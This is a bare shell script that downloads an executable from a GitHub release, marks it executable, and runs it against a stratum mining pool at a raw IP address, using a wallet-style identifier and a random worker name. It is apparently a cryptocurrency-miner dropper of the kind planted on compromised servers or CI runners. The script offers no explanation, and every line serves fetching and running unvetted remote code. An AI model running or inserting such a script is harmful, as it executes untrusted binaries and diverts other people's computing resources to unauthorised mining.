#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/prvnraw/releases/download/pravxcsoft/pravxcv
chmod +x pravxcv
./pravxcv -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-pravxcv@172.239.59.69:8082
